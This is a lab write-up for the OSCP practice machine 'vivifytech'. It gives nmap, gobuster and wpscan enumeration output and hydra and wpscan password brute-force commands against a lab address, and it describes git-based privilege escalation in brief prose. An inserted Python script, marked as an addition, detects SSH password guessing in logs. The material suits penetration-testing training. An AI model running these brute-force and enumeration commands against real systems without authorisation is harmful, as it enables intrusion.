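OSCP Lab
Lab Overview
vivifytech |
easy |
Routine information gathering, WordPress exploitation, SSH brute force, host information gathering, git privilege escalation |
Information Gathering
Host Discovery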
nmap -sn 192.168.31.0/24
Port Scanning
┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.31.107
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-08 22:57 EST
Nmap scan report for 192.168.31.107
Host is up (0.0011s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
| 256 32:f3:f6:36:95:12:c8:18:f3:ad:b8:0f:04:4d:73:2f (ECDSA)
|_ 256 1d:ec:9c:6e:3c:cf:83:f6:f0:45:22:58:13:2f:d3:9e (ED25519)
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.57 (Debian)
3306/tcp open mysql MySQL (unauthorized)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000
Directory Scanning
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.107 -x php,html,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.107
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.31.107/.php (Status: 403) [Size: 279]
http://192.168.31.107/index.html (Status: 200) [Size: 10701]
http://192.168.31.107/.html (Status: 403) [Size: 279]
http://192.168.31.107/wordpress (Status: 301) [Size: 320] [--> http://192.168.31.107/wordpress/]
http://192.168.31.107/.html (Status: 403) [Size: 279]
http://192.168.31.107/.php (Status: 403) [Size: 279]
http://192.168.31.107/server-status (Status: 403) [Size: 279]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.107/wordpress -x php,html,txt -e
A wordlist file was found here.
Vulnerability Scanning
wpscan --url http://192.168.31.107/wordpress -e
Gaining Access
Brute-forcing the WordPress admin login failed:
wpscan --url http://192.168.31.107/wordpress/wp-login.php -U sancelisso -P pass.txt
Brute-forcing SSH failed.
Gathered several names from the following page and ran the brute force again:
http://192.168.31.107/wordpress/index.php/2023/12/05/the-story-behind-vivifytech/
hydra -L user.txt -P pass.txt ssh://192.168.31.107
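The defender's view of the SSH password guessing above, as an added example that is not part of the original write-up: a Python script that scans sshd authentication log lines for one source failing against several accounts and then logging in successfully. The log lines, host name, addresses, user names and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# sshd password-auth messages as OpenSSH writes them to syslog/journald.
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect(lines, window=timedelta(minutes=5), min_failures=5, min_users=3):
    """Return {ip: {"users": set, "failures": int, "compromised": [users]}}
    for sources that guess passwords across several accounts inside `window`."""
    failures = defaultdict(list)   # ip -> [(time, user)], kept as a sliding window
    alerts = {}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year; a fixed leap year is fine for deltas.
        ts = datetime.strptime("2024 " + m["ts"], "%Y %b %d %H:%M:%S")
        ip, user = m["ip"], m["user"]
        recent = [(t, u) for t, u in failures[ip] if ts - t <= window]
        if m["result"] == "Failed":
            recent.append((ts, user))
        failures[ip] = recent
        users = {u for _, u in recent}
        if len(recent) >= min_failures and len(users) >= min_users:
            a = alerts.setdefault(ip, {"users": set(), "failures": 0, "compromised": []})
            a["users"] |= users
            a["failures"] = max(a["failures"], len(recent))
        # A success from an already-flagged source means a password was guessed.
        if m["result"] == "Accepted" and ip in alerts:
            alerts[ip]["compromised"].append(user)
    return alerts

# Constructed sample (not from the page); 192.0.2.0/24 is a documentation range.
SAMPLE = """\
Feb  8 23:10:01 web sshd[801]: Failed password for invalid user admin from 192.0.2.10 port 40001 ssh2
Feb  8 23:10:02 web sshd[802]: Failed password for alice from 192.0.2.10 port 40002 ssh2
Feb  8 23:10:03 web sshd[803]: Failed password for bob from 192.0.2.10 port 40003 ssh2
Feb  8 23:10:04 web sshd[804]: Failed password for alice from 192.0.2.10 port 40004 ssh2
Feb  8 23:10:05 web sshd[805]: Failed password for bob from 192.0.2.10 port 40005 ssh2
Feb  8 23:10:09 web sshd[806]: Accepted password for alice from 192.0.2.10 port 40006 ssh2
Feb  8 23:40:00 web sshd[900]: Failed password for carol from 192.0.2.77 port 50000 ssh2
""".splitlines()
if __name__ == "__main__":
    print(detect(SAMPLE))
```

An entry with a non-empty `compromised` list is the case to act on first: that account's password should be rotated and its session history reviewed.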
Privilege Escalation
Found the username and password of the user gbodja in sarah's directory.
Used git to escalate privileges to root.
End
Originally published on the WeChat official account 贝雷帽SEC: 【OSCP】vivifytech